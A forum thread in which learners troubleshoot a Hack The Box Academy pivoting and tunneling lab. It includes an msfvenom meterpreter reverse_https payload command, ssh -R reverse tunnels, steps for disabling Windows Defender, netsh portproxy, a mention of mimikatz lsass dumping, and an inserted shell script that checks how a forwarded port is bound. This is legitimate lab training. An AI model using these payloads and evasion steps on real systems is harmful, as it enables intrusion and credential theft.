Pivoting, tunneling, and port forwarding | Academy

Ok, took a break and solved this.

  1. reset machine
  2. Turn off everything in the Virus & Threat protection settings and add the htb-user folder and file to the Exclusions list.
  3. run Powershell as Administrator
  4. run regsvr32.exe SocksOverRDP-Plugin.dll

Hi god_f3lla! I did everything like you did, but it writes to me “check if the module is compatible with x86 (32-bit) or x64 (64-bit) regsvr32.exe”. What is it? And why do I have Windows 64-bit, and regsvr32.exe?

Hello,

I have troubles finding any domain hosts in the last two questions of Skill Assessment. Also seems like DNS server at 172.16.10.5 is not responding. Am I missing something?

Hey! I haven’t gotten to that yet. Did you have any problems with the previous page?

Hi, I am stuck on the part where I need to get a reverse tunnel from the Windows host to my attack host.
I am unable to get a reverse shell using the reverse_https payload.
My pivot machine has a listening port 127.0.0.1:8080 and forwards to 0.0.0.0:8000, but I think this is wrong. I can’t connect on 172.16.5.15:8080; it gives connection refused.
When I connect locally to 127.0.0.1:8080 it gets forwarded. How can I make it so that it listens on its internal IP instead of its loopback address?

Hi, can you still remember what you did here? I am unable to get the reverse tunnel set up. Also, your post kind of confuses me.
You set LPORT=8000 in msfvenom, but you set the reverse tunnel up with port 8080.
Could you try to set this up again and tell me what I am doing wrong?

pivot host has 172.16.5.15 and 10.129.x.x
my attack host has 10.129.x.x
the second host has 172.16.5.35 and 172.16.6.35

msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.15 -f exe -o backupscript.exe LPORT=8080

ssh -R 172.16.5.15:8080:0.0.0.0:8000 webadmin@10.129.x.x -vN -i id_rsa
The pivot host is now listening on 127.0.0.1:8080 and forwards to 0.0.0.0:8000

I have a multi/handler listening on 0.0.0.0:8000

The connection never gets through; it does not even appear at 172.16.5.15

I’m really stuck here and I really need help
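Added example, not from the thread or the Academy module: a small POSIX shell check to run on the pivot host (the box the `ssh -R` above is opened against) to see where the reverse-forwarded port actually ended up bound. It encodes the OpenSSH rule behind the symptom in the posts above: the bind address given to `ssh -R` is only honoured when the server’s sshd has `GatewayPorts yes` or `GatewayPorts clientspecified`; with the default `GatewayPorts no`, the listener lands on 127.0.0.1 no matter what the client asked for, so 172.16.5.15:8080 refuses connections while 127.0.0.1:8080 works. The `ss -Hltn` sample output and the helper names `bind_scope` and `explain_scope` are constructed for this example; it also handles IPv6 loopback and wildcard forms, which the thread does not mention.

```shell
#!/bin/sh
# Added example, not from the thread. Constructed sample of `ss -Hltn` output
# as it might look on the pivot host after `ssh -R 172.16.5.15:8080:...` was
# accepted by an sshd running with the default GatewayPorts no:
SAMPLE_SS='LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 [::1]:8080 [::]:*'

# bind_scope PORT [SS_OUTPUT]
# Prints one word summarising every TCP listener on PORT: loopback, all,
# specific, or none. Without a second argument it inspects the live host.
bind_scope() {
  port="$1"
  out="${2:-$(ss -Hltn 2>/dev/null)}"
  printf '%s\n' "$out" | awk -v p="$port" '
    {
      # field 4 is the local socket, e.g. 127.0.0.1:8080 or [::1]:8080;
      # the port is whatever follows the last colon
      n = split($4, a, ":"); lp = a[n]
      if (lp != p) next
      addr = substr($4, 1, length($4) - length(lp) - 1)
      if (addr == "127.0.0.1" || addr == "[::1]")                  seen["loopback"] = 1
      else if (addr == "0.0.0.0" || addr == "[::]" || addr == "*") seen["all"] = 1
      else                                                         seen["specific"] = 1
    }
    END {
      if ("all" in seen) print "all"
      else if ("specific" in seen) print "specific"
      else if ("loopback" in seen) print "loopback"
      else print "none"
    }'
}

# explain_scope PORT [SS_OUTPUT]
# Maps the observed scope to the sshd GatewayPorts setting that produces it.
explain_scope() {
  case "$(bind_scope "$@")" in
    loopback) echo "loopback only: sshd on this host has GatewayPorts no (the default), so the bind address given to ssh -R was ignored" ;;
    all)      echo "all interfaces: sshd has GatewayPorts yes, or clientspecified with a wildcard bind address" ;;
    specific) echo "bound to the requested address: sshd has GatewayPorts clientspecified" ;;
    none)     echo "no listener on port $1: the forward was never established; check the ssh -v output" ;;
  esac
}

# Constructed sample: reports the loopback-only case from the posts above.
explain_scope 8080 "$SAMPLE_SS"
```

On a real pivot, `bind_scope 8080` with no second argument reads the live socket table. The fix is on the pivot’s sshd, not on the client: set `GatewayPorts clientspecified` in sshd_config and restart sshd, after which the `172.16.5.15:` prefix in `ssh -R` is honoured. The same check is useful from the defending side: a forwarded port that suddenly binds to all interfaces of a server is exactly the kind of listener change worth alerting on.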

Ok so I’m stuck on the last two questions on the Skill Assessment
Been told there is no requirement to scan the full /16
When I scan the two networks that are present there are literally no other hosts
I even tried scanning the DNS subnet and nothing?

What am I missing?

Many Thanks

I had the very same issue. It seems like the box which you need to discover is not responding to ICMP packets reliably or quickly enough. I had to run the ping sweep several times to find it. Just try to increase the number of ICMP packets sent to each host or increase the timeout. Alternatively, send me a DM and I’ll send you the IP address :slight_smile:


Thank you for your advice. Since reading it I have managed to find a host and finish it off. Very much appreciated!!

How can I upload the SocksOverRDP-x64.zip? I tried with a Python server but it gives me this error

UPDATE: Solved

got it

Something I wanna say about RDP and SOCKS Tunneling with SocksOverRDP:
It just didn’t work for me…
I was at the last step where you have to use Proxifier, and I did everything like the guide said, but I could not connect to the target…
I definitely got the idea of the lesson, so I just wanted to get the flag after like 6 hours of trying…

So if you are in the same situation, just connect to the proxy Windows machine, from there connect to 172.16.5.19 (like in the guide) and there also start a Remote Desktop connection, and connect to your target (172.16.6.155) with victor’s credentials (jason’s creds didn’t work). victor has admin privileges on the target, so just go to jason’s folder and get the flag :wink:

P.S.: I am not a fan of this cheating, and I still recommend trying the normal way of doing this task, but I just wanna give some solution for people who are really stuck


Hi pavka,

Did you manage the skill assessment? I am legit stuck. I can’t do ssh because I get permission denied, and when I look under the webadmin directory I see an OpenSSH private key, although when I use it after performing chmod 600 I am getting a “Failed to load key id_rsa: error in libcrypto”. What am I doing wrong? Am I missing something? Please, any help from all those who managed to complete the skill assessment. I much appreciate your help.

latest update

Got it working and found a way to pivot to the user “m…” using Metasploit…

Now I am stuck again. I see vfrank and I tried to dump lsass using mimikatz, got several NTLM hashes, none of them are crackable. Not sure what to do next, any help? :frowning:

I finally got the module done. Wow, what a skill assessment, all worth the pain tho! :slight_smile:


Hi Pavkov, thanks. I was in the exact same spot. The final step and the provided Jason creds just did not work, whichever way I tried it. Vic worked, thanks. I think this module definitely needs an update. Also with the whole ptunnel-ng and chisel fiasco. It’s just a bad module.


Lab solved.
Answer was in plain sight.

Hello! I’ve been struggling with the Port Forwarding with Windows Netsh for a while!
Could it be that the command I’m supposed to enter:

netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

is incorrect?!

Once you make your initial foothold you will be RDP’ing through every other internal IP target. You will not have to use netsh.exe